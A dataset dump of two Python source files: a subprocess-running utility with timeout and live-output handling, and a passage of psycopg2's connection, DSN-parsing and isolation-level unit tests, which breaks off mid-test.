source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
process.py
|
from typing import Any, Optional, TypedDict, Union
from ._dict import Dict
from subprocess import (Popen, PIPE, DEVNULL, TimeoutExpired,
CalledProcessError)
from tempfile import NamedTemporaryFile
from threading import Thread, Timer
from queue import Queue, Empty
import sys, time, io, asyncio, threading
from .interrupt import terminate_thread
ON_POSIX = 'posix' in sys.builtin_module_names
def _silent_interrupt(func):
def wrapper(self, *args, **kwargs):
try:
func(self, *args, **kwargs)
except KeyboardInterrupt:
pass
return
wrapper.__name__ = func.__name__
return wrapper
class MyProcess():
'''
Tool for launching a process with support for live stdout/stderr
handling, as well as timeout, custom input and stdout/stderr
capturing/non-caputring.
Uses threads and queues.
Arguments:
args: arguments passed to Popen
shell: passed to Popen
input: string that simulates stdin
timeout: None or float timeout in seconds
check: bool. If true and an error ocurred, throws an exception
capture_stdout: bool. If true, output is assigned to 'self.stdout'
live_stdout: None, io.BufferedWriter instance, or any object
with methods write and flush. If given, write(line) and flush()
are called for each line of stdout as soon as it is received
(as soon as the program flushes), with a maximum delay of
'micro_delay'.
timeout_stdout: None (infinity) or float. Time in seconds to
wait for the live_stdout handler after the process terminates.
Recall that the live_stdout handler may still have some
remaining lines to handle once the process finishes.
The additional time will not affect 'self.elapsed'.
max_stdout: None, int or string. If more than max_stdout bytes
are received, the process is killed. Notice that if capturing
and live_stdout are disabled, no bytes will be received at all.
Accepts string of the form '#', '#k', '#M', '#G', '#T'.
capture_stderr: (see capture_stdout)
stderr_handler: (see stdout_handler)
wait_stderr_handler: (see wait_stdout_handler)
max_stderr: (see max_stdout)
encoding: string used for encoding/decoding stdin/stdout/stderr
micro_delay: float seconds (see stdout_handler)
block: bool. Blocks the current thread unitl the process finishes.
If false, you must call wait()
Returns None but sets:
self.stdout: string, stdout of the process (if captured)
self.stderr: string, stderr of the process (if captured)
self.elapsed: float, approximate elapsed time of the process
in seconds.
self.timeout: float, copy of the timeout argument
self.error: None or string, either 'TimeoutExpired',
'ExcessOfOutput', 'KeyboardInterrupt',
'NonZeroExitCode #', or an unexpected exception as string.
self.returncode: int, exit code of the process
'''
def __init__(self, args, shell=False, env=None, cwd=None):
kwargs = locals()
kwargs.pop('self')
self.kwargs = Dict(kwargs)
def run(
self,
input: str = None,
timeout: float = None,
check: bool = False,
capture_stdout=True,
live_stdout=None,
timeout_stdout=None,
max_stdout=None,
capture_stderr=False,
live_stderr=None,
timeout_stderr=None,
max_stderr=None,
encoding='utf-8',
micro_delay=1e-3,
):
kwargs = locals()
kwargs.pop('self')
self.kwargs.update(kwargs)
self._start()
interrupt = Thread(
target=self._kill,
args=['KeyboardInterrupt'],
)
try:
#self._sync.wait() was here before but
#the loop is needed for quick handling of
#terminate_thread(thread, KeyboardInterrupt)
while not self._sync.is_set():
time.sleep(1e-4)
except KeyboardInterrupt:
interrupt.start()
except Exception as e:
self._error = str(e)
while 1:
try:
self._sync.wait()
if check and self.error:
raise CalledProcessError(
returncode=self.returncode,
cmd=self.kwargs.args,
)
break
except KeyboardInterrupt:
pass
return self
async def async_run(self, input=None, timeout=None, check=False,
capture_stdout=True, live_stdout=None,
timeout_stdout=None, max_stdout=None,
capture_stderr=False, live_stderr=None,
timeout_stderr=None, max_stderr=None, encoding='utf-8',
micro_delay=1e-3):
kwargs = locals()
kwargs.pop('self')
self.kwargs.update(kwargs)
self._start()
assert self._async
await self._async.wait()
if check and self.error:
raise CalledProcessError(
returncode=self.returncode,
cmd=self.kwargs.args,
)
return self
def run_detached(
self,
input: str = None,
timeout: float = None,
check: bool = False,
capture_stdout=True,
live_stdout=None,
timeout_stdout=None,
max_stdout=None,
capture_stderr=False,
live_stderr=None,
timeout_stderr=None,
max_stderr=None,
encoding='utf-8',
micro_delay=1e-3,
):
kwargs = locals()
kwargs.pop('self')
self.kwargs.update(kwargs)
self._start()
return self
def _start(self):
self._done = False
self._stop = False
self._error = None
self._timeout = self._parse_time(self.kwargs.timeout, None)
self._micro_delay = self.kwargs.micro_delay
self._encoding = self.kwargs.encoding
self._max_stdout = self._parse_eng(self.kwargs.max_stdout)
self._max_stderr = self._parse_eng(self.kwargs.max_stderr)
self._timeout_stdout = self._parse_time(self.kwargs.timeout_stdout,
float('inf'))
self._timeout_stderr = self._parse_time(self.kwargs.timeout_stderr,
float('inf'))
self._threads = {}
self._check = self.kwargs.check
self._sync = threading.Event()
try:
self._async = asyncio.Event()
except RuntimeError:
self._async = None
self._threads['waiter'] = Thread(target=self._waiter)
if self._timeout:
self._threads['timer'] = Timer(
self._timeout,
self._kill,
args=['TimeoutExpired'],
)
config = {
'out': {
'capture': self.kwargs.capture_stdout,
'live': self.kwargs.live_stdout,
'wait': self._timeout_stdout,
'max_size': self._max_stdout,
},
'err': {
'capture': self.kwargs.capture_stderr,
'live': self.kwargs.live_stderr,
'wait': self._timeout_stderr,
'max_size': self._max_stderr,
},
}
for key, val in config.items():
piped = val['capture'] or val['live']
val['pipe'] = PIPE if piped else DEVNULL
self._start_time = time.time()
try:
self._process = Popen(
self.kwargs.args,
shell=self.kwargs.shell,
stdin=PIPE,
stdout=config['out']['pipe'],
stderr=config['err']['pipe'],
#bufsize=1,
close_fds=ON_POSIX,
env=self.kwargs.env,
cwd=self.kwargs.cwd,
)
except FileNotFoundError as e:
self._stop = True
self._done = True
self._sync.set()
if self._async:
self._async.set()
self.error = str(e)
if self.kwargs.check:
raise
return
assert self._process.stdin
if self.kwargs.input != None:
_input = self.kwargs.input.encode(self.kwargs.encoding)
self._process.stdin.write(_input)
self._process.stdin.close()
config['out']['source'] = self._process.stdout
config['err']['source'] = self._process.stderr
self._buffer_stdout = io.StringIO(
) if config['out']['capture'] else None
config['out']['buffer'] = self._buffer_stdout
self._buffer_stderr = io.StringIO(
) if config['err']['capture'] else None
config['err']['buffer'] = self._buffer_stderr
for key, val in config.items():
queues = []
h = {}
if val['capture']:
h['capture'] = dict(ostream=val['buffer'], flush=False,
wait=float('inf'))
if val['live']:
h['handler'] = dict(ostream=val['live'], flush=True,
wait=val['wait'])
for name, kwargs in h.items():
queues.append(Queue())
self._threads[f'std{key}_{name}'] = Thread(
target=self._live_handler,
args=[queues[-1]],
kwargs=kwargs,
)
if queues:
self._threads[f'{key}-main'] = Thread(
target=self._non_blocking_reader,
kwargs=dict(istream=val['source'], queues=queues,
max_size=val['max_size']))
for key, t in self._threads.items():
t.start()
return
def _waiter(self):
try:
while not self._stop:
if self._process.poll() != None:
self._stop = True
else:
time.sleep(self._micro_delay)
if self._process.stdout:
self._process.stdout.close()
if self._process.stderr:
self._process.stderr.close()
def get_value(buffer):
if buffer == None:
return None
value = buffer.getvalue()
buffer.close()
return value
self._end = time.time()
if 'timer' in self._threads:
self._threads['timer'].cancel()
self.stdout = get_value(self._buffer_stdout)
self.stderr = get_value(self._buffer_stderr)
self.elapsed = self._end - self._start_time
self.timeout = self._timeout
self.returncode = self._process.wait()
if self._error:
self.error = self._error
elif self.returncode != 0:
self.error = f'NonZeroExitCode {self.returncode}'
else:
self.error = None
for key, t in self._threads.items():
if key != 'waiter':
t.join()
finally:
self._done = True
self._sync.set()
if self._async:
self._async.set()
return
def kill(self):
self._kill('KilledByUser')
while not self._done:
time.sleep(1e-3)
return
def _kill(self, error):
if self.is_active():
self._error = error
if 'timer' in self._threads:
self._threads['timer'].cancel()
self._stop = True
self._process.kill()
for k, t in self._threads.items():
if k != 'waiter' and k != 'timer':
terminate_thread(t, KeyboardInterrupt)
for k, t in self._threads.items():
if k != 'waiter' and k != 'timer':
t.join()
@_silent_interrupt
def _non_blocking_reader(self, istream, queues, max_size):
#https://stackoverflow.com/a/4896288/3671939
for line in iter(istream.readline, b''):
max_size -= len(line)
if max_size < 0:
self._stop = True
self._error = 'ExcessOfOutput'
if self._stop:
break
line = line.decode(self._encoding)
for q in queues:
q.put(line)
return istream.close()
@_silent_interrupt
def _live_handler(self, queue, ostream, flush, wait):
waiting = False
waiting_start = None
while not self._stop or waiting:
try:
elem = queue.get(timeout=self._micro_delay)
except Empty:
waiting = False
else:
ostream.write(elem)
if flush:
ostream.flush()
if self._stop:
if waiting_start == None:
waiting_start = time.time()
waiting = True
if time.time() - waiting_start > wait:
waiting = False
return
def _parse_eng(self, x):
units = {'k': 1e3, 'M': 1e6, 'G': 1e9, 'T': 1e12}
if x == None:
return float('inf')
elif isinstance(x, int):
return x
elif isinstance(x, float):
return round(x)
elif x.isdigit():
return int(x)
else:
return int(x[:-1]) * int(units[x[-1]])
def _parse_time(self, x, ifNone):
return ifNone if x == None else x
def is_active(self):
return self._done == False
class Tee(io.BufferedWriter):
"""
Simple BufferedWriter that broadcasts
data to multiple BufferedWriters
"""
def __init__(self, *outputs):
self.outputs = outputs
def write(self, s):
for out in self.outputs:
out.write(s)
def flush(self):
for out in self.outputs:
out.flush()
class CustomOStream(io.BufferedWriter):
def __init__(self, write_function, flush_function=None):
self.write = write_function
self.flush = flush_function or (lambda: 0) # type:ignore
self.tmp = NamedTemporaryFile('r', suffix='.out')
self.fileno = self.tmp.fileno # Provide a dummy fileno
def __del__(self):
self.tmp.close()
object.__del__(self) # type:ignore
class TemporaryStdout(io.RawIOBase):
'''
Replace stdout temporarily with another stream
'''
def __enter__(self):
self.prev = sys.stdout
sys.stdout = self
def __exit__(self, *args):
sys.stdout = self.prev
def test():
# Testing mode
cmd1 = ' && '.join(f'sleep 0.25 && echo "{i} "' for i in range(4))
cmd2 = "python3 -c 'import time; [print(i, flush=True) or time.sleep(0.25) for i in range(4)] ; print(input().upper());'"
cmd3 = "python3 -c 'import time; [print(i, flush=True) or time.sleep(0.25) for i in range(4)] ; print(input().upper()); exit(1)'"
cmd4 = "python3 -c 'for i in range(10**6): print(str(0)*i, flush=True)'"
class TmpWriter:
def write(self, s):
print(s, end='', flush=True) or time.sleep(0.6)
tests = [
{
'title': 'No live printing, no error and capture stdout',
'cmd': cmd1,
'kwargs': dict(
shell=True,
timeout=None,
capture_stdout=True,
)
},
{
'title':
'Print 1..4 (live), no error and capture stdout',
'cmd':
cmd1,
'kwargs':
dict(
shell=True,
timeout=1.1,
live_stdout=sys.stdout,
capture_stdout=True,
)
},
{
'title':
'Print 1..4 (live), no error and do not capture stdout',
'cmd':
cmd1,
'kwargs':
dict(
shell=True,
timeout=1.1,
live_stdout=sys.stdout,
capture_stdout=False,
)
},
{
'title':
'Print 1..? (live), Timeout error, capture stdout',
'cmd':
cmd1,
'kwargs':
dict(
shell=True,
timeout=0.6,
live_stdout=sys.stdout,
capture_stdout=True,
)
},
{
'title':
'Live printing, Timeout error, no capture, wait for handler',
'cmd':
cmd2,
'kwargs':
dict(
shell=True,
timeout=0.6,
live_stdout=TmpWriter(),
#wait_live_stdout=False,
capture_stdout=False,
)
},
{
'title': 'Live printing, Excess of Output',
'cmd': cmd4,
'kwargs': dict(
shell=True,
live_stdout=sys.stdout,
max_stdout='1k',
)
},
]
for i, test in enumerate(tests):
print('-' * 10, f'TEST {i+1}', '-' * 10)
print(test['title'])
p = MyProcess(
test['cmd'],
shell=test['kwargs'].pop('shell', False),
)
p.run(**test['kwargs'])
print('Elapsed:', p.elapsed)
print('Error:', p.error)
print('Stdout:', p.stdout)
exit(0) # Required for some reason
|
test_connection.py
|
#!/usr/bin/env python
# test_connection.py - unit test for connection attributes
#
# Copyright (C) 2008-2011 James Henstridge <james@jamesh.id.au>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import re
import os
import sys
import time
import threading
import subprocess as sp
from operator import attrgetter
import psycopg2
import psycopg2.errorcodes
from psycopg2 import extensions as ext
from .testutils import (
script_to_py3,
unittest,
decorate_all_tests,
skip_if_no_superuser,
skip_before_postgres,
skip_after_postgres,
skip_before_libpq,
ConnectingTestCase,
skip_if_tpc_disabled,
skip_if_windows,
slow,
)
from .testconfig import dsn, dbname
class ConnectionTests(ConnectingTestCase):
def test_closed_attribute(self):
conn = self.conn
self.assertEqual(conn.closed, False)
conn.close()
self.assertEqual(conn.closed, True)
def test_close_idempotent(self):
conn = self.conn
conn.close()
conn.close()
self.assertTrue(conn.closed)
def test_cursor_closed_attribute(self):
conn = self.conn
curs = conn.cursor()
self.assertEqual(curs.closed, False)
curs.close()
self.assertEqual(curs.closed, True)
# Closing the connection closes the cursor:
curs = conn.cursor()
conn.close()
self.assertEqual(curs.closed, True)
@skip_before_postgres(8, 4)
@skip_if_no_superuser
@skip_if_windows
def test_cleanup_on_badconn_close(self):
# ticket #148
conn = self.conn
cur = conn.cursor()
self.assertRaises(
psycopg2.OperationalError,
cur.execute,
"select pg_terminate_backend(pg_backend_pid())",
)
self.assertEqual(conn.closed, 2)
conn.close()
self.assertEqual(conn.closed, 1)
def test_reset(self):
conn = self.conn
# switch session characteristics
conn.autocommit = True
conn.isolation_level = "serializable"
conn.readonly = True
if self.conn.server_version >= 90100:
conn.deferrable = False
self.assertTrue(conn.autocommit)
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
self.assertTrue(conn.readonly is True)
if self.conn.server_version >= 90100:
self.assertTrue(conn.deferrable is False)
conn.reset()
# now the session characteristics should be reverted
self.assertTrue(not conn.autocommit)
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_DEFAULT)
self.assertTrue(conn.readonly is None)
if self.conn.server_version >= 90100:
self.assertTrue(conn.deferrable is None)
def test_notices(self):
conn = self.conn
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
cur.execute("create temp table chatty (id serial primary key);")
self.assertEqual("CREATE TABLE", cur.statusmessage)
self.assertTrue(conn.notices)
def test_notices_consistent_order(self):
conn = self.conn
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
cur.execute(
"""
create temp table table1 (id serial);
create temp table table2 (id serial);
"""
)
cur.execute(
"""
create temp table table3 (id serial);
create temp table table4 (id serial);
"""
)
self.assertEqual(4, len(conn.notices))
self.assertTrue("table1" in conn.notices[0])
self.assertTrue("table2" in conn.notices[1])
self.assertTrue("table3" in conn.notices[2])
self.assertTrue("table4" in conn.notices[3])
@slow
def test_notices_limited(self):
conn = self.conn
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
for i in range(0, 100, 10):
sql = " ".join(
["create temp table table%d (id serial);" % j for j in range(i, i + 10)]
)
cur.execute(sql)
self.assertEqual(50, len(conn.notices))
self.assertTrue("table99" in conn.notices[-1], conn.notices[-1])
@slow
def test_notices_deque(self):
from collections import deque
conn = self.conn
self.conn.notices = deque()
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
cur.execute(
"""
create temp table table1 (id serial);
create temp table table2 (id serial);
"""
)
cur.execute(
"""
create temp table table3 (id serial);
create temp table table4 (id serial);"""
)
self.assertEqual(len(conn.notices), 4)
self.assertTrue("table1" in conn.notices.popleft())
self.assertTrue("table2" in conn.notices.popleft())
self.assertTrue("table3" in conn.notices.popleft())
self.assertTrue("table4" in conn.notices.popleft())
self.assertEqual(len(conn.notices), 0)
# not limited, but no error
for i in range(0, 100, 10):
sql = " ".join(
[
"create temp table table2_%d (id serial);" % j
for j in range(i, i + 10)
]
)
cur.execute(sql)
self.assertEqual(len([n for n in conn.notices if "CREATE TABLE" in n]), 100)
def test_notices_noappend(self):
conn = self.conn
self.conn.notices = None # will make an error swallowes ok
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
cur.execute("create temp table table1 (id serial);")
self.assertEqual(self.conn.notices, None)
def test_server_version(self):
self.assertTrue(self.conn.server_version)
def test_protocol_version(self):
self.assertTrue(
self.conn.protocol_version in (2, 3), self.conn.protocol_version
)
def test_tpc_unsupported(self):
cnn = self.conn
if cnn.server_version >= 80100:
return self.skipTest("tpc is supported")
self.assertRaises(psycopg2.NotSupportedError, cnn.xid, 42, "foo", "bar")
@slow
@skip_before_postgres(8, 2)
def test_concurrent_execution(self):
def slave():
cnn = self.connect()
cur = cnn.cursor()
cur.execute("select pg_sleep(4)")
cur.close()
cnn.close()
t1 = threading.Thread(target=slave)
t2 = threading.Thread(target=slave)
t0 = time.time()
t1.start()
t2.start()
t1.join()
t2.join()
self.assertTrue(time.time() - t0 < 7, "something broken in concurrency")
def test_encoding_name(self):
self.conn.set_client_encoding("EUC_JP")
# conn.encoding is 'EUCJP' now.
cur = self.conn.cursor()
ext.register_type(ext.UNICODE, cur)
cur.execute("select 'foo'::text;")
self.assertEqual(cur.fetchone()[0], "foo")
def test_connect_nonnormal_envvar(self):
# We must perform encoding normalization at connection time
self.conn.close()
oldenc = os.environ.get("PGCLIENTENCODING")
os.environ["PGCLIENTENCODING"] = "utf-8" # malformed spelling
try:
self.conn = self.connect()
finally:
if oldenc is not None:
os.environ["PGCLIENTENCODING"] = oldenc
else:
del os.environ["PGCLIENTENCODING"]
def test_connect_no_string(self):
class MyString(str):
pass
conn = psycopg2.connect(MyString(dsn))
conn.close()
def test_weakref(self):
from weakref import ref
import gc
conn = psycopg2.connect(dsn)
w = ref(conn)
conn.close()
del conn
gc.collect()
self.assertTrue(w() is None)
@slow
def test_commit_concurrency(self):
# The problem is the one reported in ticket #103. Because of bad
# status check, we commit even when a commit is already on its way.
# We can detect this condition by the warnings.
conn = self.conn
notices = []
stop = []
def committer():
while not stop:
conn.commit()
while conn.notices:
notices.append((2, conn.notices.pop()))
cur = conn.cursor()
t1 = threading.Thread(target=committer)
t1.start()
i = 1
for i in range(1000):
cur.execute("select %s;", (i,))
conn.commit()
while conn.notices:
notices.append((1, conn.notices.pop()))
# Stop the committer thread
stop.append(True)
self.assertTrue(not notices, "%d notices raised" % len(notices))
def test_connect_cursor_factory(self):
import psycopg2.extras
conn = self.connect(cursor_factory=psycopg2.extras.DictCursor)
cur = conn.cursor()
cur.execute("select 1 as a")
self.assertEqual(cur.fetchone()["a"], 1)
def test_cursor_factory(self):
self.assertEqual(self.conn.cursor_factory, None)
cur = self.conn.cursor()
cur.execute("select 1 as a")
self.assertRaises(TypeError, (lambda r: r["a"]), cur.fetchone())
self.conn.cursor_factory = psycopg2.extras.DictCursor
self.assertEqual(self.conn.cursor_factory, psycopg2.extras.DictCursor)
cur = self.conn.cursor()
cur.execute("select 1 as a")
self.assertEqual(cur.fetchone()["a"], 1)
self.conn.cursor_factory = None
self.assertEqual(self.conn.cursor_factory, None)
cur = self.conn.cursor()
cur.execute("select 1 as a")
self.assertRaises(TypeError, (lambda r: r["a"]), cur.fetchone())
def test_cursor_factory_none(self):
# issue #210
conn = self.connect()
cur = conn.cursor(cursor_factory=None)
self.assertEqual(type(cur), ext.cursor)
conn = self.connect(cursor_factory=psycopg2.extras.DictCursor)
cur = conn.cursor(cursor_factory=None)
self.assertEqual(type(cur), psycopg2.extras.DictCursor)
def test_failed_init_status(self):
class SubConnection(ext.connection):
def __init__(self, dsn):
try:
super(SubConnection, self).__init__(dsn)
except Exception:
pass
c = SubConnection("dbname=thereisnosuchdatabasemate password=foobar")
self.assertTrue(c.closed, "connection failed so it must be closed")
self.assertTrue("foobar" not in c.dsn, "password was not obscured")
class ParseDsnTestCase(ConnectingTestCase):
def test_parse_dsn(self):
from psycopg2 import ProgrammingError
self.assertEqual(
ext.parse_dsn("dbname=test user=tester password=secret"),
dict(user="tester", password="secret", dbname="test"),
"simple DSN parsed",
)
self.assertRaises(
ProgrammingError, ext.parse_dsn, "dbname=test 2 user=tester password=secret"
)
self.assertEqual(
ext.parse_dsn("dbname='test 2' user=tester password=secret"),
dict(user="tester", password="secret", dbname="test 2"),
"DSN with quoting parsed",
)
# Can't really use assertRaisesRegexp() here since we need to
# make sure that secret is *not* exposed in the error messgage
# (and it also requires python >= 2.7).
raised = False
try:
# unterminated quote after dbname:
ext.parse_dsn("dbname='test 2 user=tester password=secret")
except ProgrammingError as e:
raised = True
self.assertTrue(
str(e).find("secret") < 0, "DSN was not exposed in error message"
)
except e:
self.fail("unexpected error condition: " + repr(e))
self.assertTrue(raised, "ProgrammingError raised due to invalid DSN")
@skip_before_libpq(9, 2)
def test_parse_dsn_uri(self):
self.assertEqual(
ext.parse_dsn("postgresql://tester:secret@/test"),
dict(user="tester", password="secret", dbname="test"),
"valid URI dsn parsed",
)
raised = False
try:
# extra '=' after port value
ext.parse_dsn(dsn="postgresql://tester:secret@/test?port=1111=x")
except psycopg2.ProgrammingError as e:
raised = True
self.assertTrue(
str(e).find("secret") < 0, "URI was not exposed in error message"
)
except e:
self.fail("unexpected error condition: " + repr(e))
self.assertTrue(raised, "ProgrammingError raised due to invalid URI")
def test_unicode_value(self):
snowman = "\u2603"
d = ext.parse_dsn("dbname=" + snowman)
if sys.version_info[0] < 3:
self.assertEqual(d["dbname"], snowman.encode("utf8"))
else:
self.assertEqual(d["dbname"], snowman)
def test_unicode_key(self):
snowman = "\u2603"
self.assertRaises(
psycopg2.ProgrammingError, ext.parse_dsn, snowman + "=" + snowman
)
def test_bad_param(self):
self.assertRaises(TypeError, ext.parse_dsn, None)
self.assertRaises(TypeError, ext.parse_dsn, 42)
def test_str_subclass(self):
class MyString(str):
pass
res = ext.parse_dsn(MyString("dbname=test"))
self.assertEqual(res, {"dbname": "test"})
class MakeDsnTestCase(ConnectingTestCase):
def test_empty_arguments(self):
self.assertEqual(ext.make_dsn(), "")
def test_empty_string(self):
dsn = ext.make_dsn("")
self.assertEqual(dsn, "")
def test_params_validation(self):
self.assertRaises(psycopg2.ProgrammingError, ext.make_dsn, "dbnamo=a")
self.assertRaises(psycopg2.ProgrammingError, ext.make_dsn, dbnamo="a")
self.assertRaises(
psycopg2.ProgrammingError, ext.make_dsn, "dbname=a", nosuchparam="b"
)
def test_empty_param(self):
dsn = ext.make_dsn(dbname="sony", password="")
self.assertDsnEqual(dsn, "dbname=sony password=''")
def test_escape(self):
dsn = ext.make_dsn(dbname="hello world")
self.assertEqual(dsn, "dbname='hello world'")
dsn = ext.make_dsn(dbname=r"back\slash")
self.assertEqual(dsn, r"dbname=back\\slash")
dsn = ext.make_dsn(dbname="quo'te")
self.assertEqual(dsn, r"dbname=quo\'te")
dsn = ext.make_dsn(dbname="with\ttab")
self.assertEqual(dsn, "dbname='with\ttab'")
dsn = ext.make_dsn(dbname=r"\every thing'")
self.assertEqual(dsn, r"dbname='\\every thing\''")
def test_database_is_a_keyword(self):
self.assertEqual(ext.make_dsn(database="sigh"), "dbname=sigh")
def test_params_merging(self):
dsn = ext.make_dsn("dbname=foo host=bar", host="baz")
self.assertDsnEqual(dsn, "dbname=foo host=baz")
dsn = ext.make_dsn("dbname=foo", user="postgres")
self.assertDsnEqual(dsn, "dbname=foo user=postgres")
def test_no_dsn_munging(self):
dsnin = "dbname=a host=b user=c password=d"
dsn = ext.make_dsn(dsnin)
self.assertEqual(dsn, dsnin)
def test_null_args(self):
dsn = ext.make_dsn("dbname=foo", user="bar", password=None)
self.assertDsnEqual(dsn, "dbname=foo user=bar")
@skip_before_libpq(9, 2)
def test_url_is_cool(self):
url = "postgresql://tester:secret@/test?application_name=wat"
dsn = ext.make_dsn(url)
self.assertEqual(dsn, url)
dsn = ext.make_dsn(url, application_name="woot")
self.assertDsnEqual(
dsn, "dbname=test user=tester password=secret application_name=woot"
)
self.assertRaises(
psycopg2.ProgrammingError,
ext.make_dsn,
"postgresql://tester:secret@/test?nosuch=param",
)
self.assertRaises(psycopg2.ProgrammingError, ext.make_dsn, url, nosuch="param")
@skip_before_libpq(9, 3)
def test_get_dsn_parameters(self):
conn = self.connect()
d = conn.get_dsn_parameters()
self.assertEqual(d["dbname"], dbname) # the only param we can check reliably
self.assertTrue("password" not in d, d)
class IsolationLevelsTestCase(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
conn = self.connect()
cur = conn.cursor()
try:
cur.execute("drop table isolevel;")
except psycopg2.ProgrammingError:
conn.rollback()
cur.execute("create table isolevel (id integer);")
conn.commit()
conn.close()
def test_isolation_level(self):
conn = self.connect()
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_DEFAULT)
def test_encoding(self):
conn = self.connect()
self.assertTrue(conn.encoding in ext.encodings)
def test_set_isolation_level(self):
conn = self.connect()
curs = conn.cursor()
levels = [
("read uncommitted", ext.ISOLATION_LEVEL_READ_UNCOMMITTED),
("read committed", ext.ISOLATION_LEVEL_READ_COMMITTED),
("repeatable read", ext.ISOLATION_LEVEL_REPEATABLE_READ),
("serializable", ext.ISOLATION_LEVEL_SERIALIZABLE),
]
for name, level in levels:
conn.set_isolation_level(level)
# the only values available on prehistoric PG versions
if conn.server_version < 80000:
if level in (
ext.ISOLATION_LEVEL_READ_UNCOMMITTED,
ext.ISOLATION_LEVEL_REPEATABLE_READ,
):
name, level = levels[levels.index((name, level)) + 1]
self.assertEqual(conn.isolation_level, level)
curs.execute("show transaction_isolation;")
got_name = curs.fetchone()[0]
self.assertEqual(name, got_name)
conn.commit()
self.assertRaises(ValueError, conn.set_isolation_level, -1)
self.assertRaises(ValueError, conn.set_isolation_level, 5)
def test_set_isolation_level_autocommit(self):
conn = self.connect()
curs = conn.cursor()
conn.set_isolation_level(ext.ISOLATION_LEVEL_AUTOCOMMIT)
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_DEFAULT)
self.assertTrue(conn.autocommit)
conn.isolation_level = "serializable"
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
self.assertTrue(conn.autocommit)
curs.execute("show transaction_isolation;")
self.assertEqual(curs.fetchone()[0], "serializable")
def test_set_isolation_level_default(self):
conn = self.connect()
curs = conn.cursor()
conn.autocommit = True
curs.execute("set default_transaction_isolation to 'read committed'")
conn.autocommit = False
conn.set_isolation_level(ext.ISOLATION_LEVEL_SERIALIZABLE)
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
curs.execute("show transaction_isolation")
self.assertEqual(curs.fetchone()[0], "serializable")
conn.rollback()
conn.set_isolation_level(ext.ISOLATION_LEVEL_DEFAULT)
curs.execute("show transaction_isolation")
self.assertEqual(curs.fetchone()[0], "read committed")
def test_set_isolation_level_abort(self):
conn = self.connect()
cur = conn.cursor()
self.assertEqual(ext.TRANSACTION_STATUS_IDLE, conn.get_transaction_status())
cur.execute("insert into isolevel values (10);")
self.assertEqual(ext.TRANSACTION_STATUS_INTRANS, conn.get_transaction_status())
conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_SERIALIZABLE)
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_IDLE, conn.get_transaction_status()
)
cur.execute("select count(*) from isolevel;")
self.assertEqual(0, cur.fetchone()[0])
cur.execute("insert into isolevel values (10);")
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_INTRANS,
conn.get_transaction_status(),
)
conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_IDLE, conn.get_transaction_status()
)
cur.execute("select count(*) from isolevel;")
self.assertEqual(0, cur.fetchone()[0])
cur.execute("insert into isolevel values (10);")
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_IDLE, conn.get_transaction_status()
)
conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED)
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_IDLE, conn.get_transaction_status()
)
cur.execute("select count(*) from isolevel;")
self.assertEqual(1, cur.fetchone()[0])
self.assertEqual(
conn.isolation_level, psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED
)
def test_isolation_level_autocommit(self):
cnn1 = self.connect()
cnn2 = self.connect()
cnn2.set_isolation_level(ext.ISOLATION_LEVEL_AUTOCOMMIT)
cur1 = cnn1.cursor()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(0, cur1.fetchone()[0])
cnn1.commit()
cur2 = cnn2.cursor()
cur2.execute("insert into isolevel values (10);")
cur1.execute("select count(*) from isolevel;")
self.assertEqual(1, cur1.fetchone()[0])
def test_isolation_level_read_committed(self):
cnn1 = self.connect()
cnn2 = self.connect()
cnn2.set_isolation_level(ext.ISOLATION_LEVEL_READ_COMMITTED)
cur1 = cnn1.cursor()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(0, cur1.fetchone()[0])
cnn1.commit()
cur2 = cnn2.cursor()
cur2.execute("insert into isolevel values (10);")
cur1.execute("insert into isolevel values (20);")
cur2.execute("select count(*) from isolevel;")
self.assertEqual(1, cur2.fetchone()[0])
cnn1.commit()
cur2.execute("select count(*) from isolevel;")
self.assertEqual(2, cur2.fetchone()[0])
cur1.execute("select count(*) from isolevel;")
self.assertEqual(1, cur1.fetchone()[0])
cnn2.commit()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(2, cur1.fetchone()[0])
def test_isolation_level_serializable(self):
cnn1 = self.connect()
cnn2 = self.connect()
cnn2.set_isolation_level(ext.ISOLATION_LEVEL_SERIALIZABLE)
cur1 = cnn1.cursor()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(0, cur1.fetchone()[0])
cnn1.commit()
cur2 = cnn2.cursor()
cur2.execute("insert into isolevel values (10);")
